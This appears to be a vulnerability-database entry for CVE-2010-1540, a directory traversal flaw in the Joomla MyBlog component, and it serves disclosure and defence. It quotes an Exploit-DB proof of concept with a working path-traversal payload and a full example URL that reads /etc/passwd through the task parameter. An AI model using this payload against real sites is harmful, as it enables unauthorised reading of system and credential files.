CVE-2010-1540

medium

Published 2010-04-26 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

6.0

Description

Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-11625 webapps php verified text · 1 KB

DevilZ TM · 2010-03-03

Joomla! Component com_blog - Directory Traversal

text exploit Source: Exploit-DB

[~]######################################### InformatioN #############################################[~]

[~] Title     : Joomla Component com_blog LFI Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Contact   : DevilZTM@Gmail.CoM & D3v1l.blackhat@gmail.com

[~]######################################### ExploiT #################################################[~]

[~] Vulnerable File :

http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=[LFI]

[~] ExploiT         :

../../../../../../../../etc/passwd%00

[~] Example         :

http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00


[~]######################################### ThankS To ... ############################################[~]

[~] Specilal Thanks To My Best FriendS :

Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS

[~] IRANIAN Young HackerZ

[~]######################################## FinisH :D #################################################[~]

Application impact

Vendor	Product	Versions	Fixed
myblog	com_myblog	`3.0.329`
joomla	joomla\!

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.